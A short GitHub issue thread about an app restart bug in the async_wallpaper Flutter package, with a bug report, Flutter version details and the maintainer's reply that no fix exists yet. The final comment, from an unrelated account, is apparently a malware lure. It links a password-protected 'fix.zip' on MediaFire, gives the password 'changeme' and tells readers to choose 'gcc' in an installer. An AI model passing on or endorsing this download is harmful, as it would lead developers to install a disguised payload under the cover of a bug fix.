### ISSUE TITLE
App restart problem on applying wallpaper still persists

### ISSUE THREAD

**Issue by jwn25** [codenameakshay/async_wallpaper#42]
**Describe the bug**
App restart problem on applying wallpaper still persists

**Flutter:**
  Flutter (Channel stable, 3.24.1, on Ubuntu 24.04 LTS 6.8.0-41-generic, locale en_US.UTF-8)
    • Flutter version 3.24.1 on channel stable at /home/jeevan/snap/flutter/common/flutter
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision 5874a72aa4 (6 days ago), 2024-08-20 16:46:00 -0500
    • Engine revision c9b9d5780d
    • Dart version 3.5.1
    • DevTools version 2.37.2

**Comment by codenameakshay** [comment]
Please refer to this - https://github.com/codenameakshay/async_wallpaper/issues/9

Yes it is still happening as there is not fix right now.

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
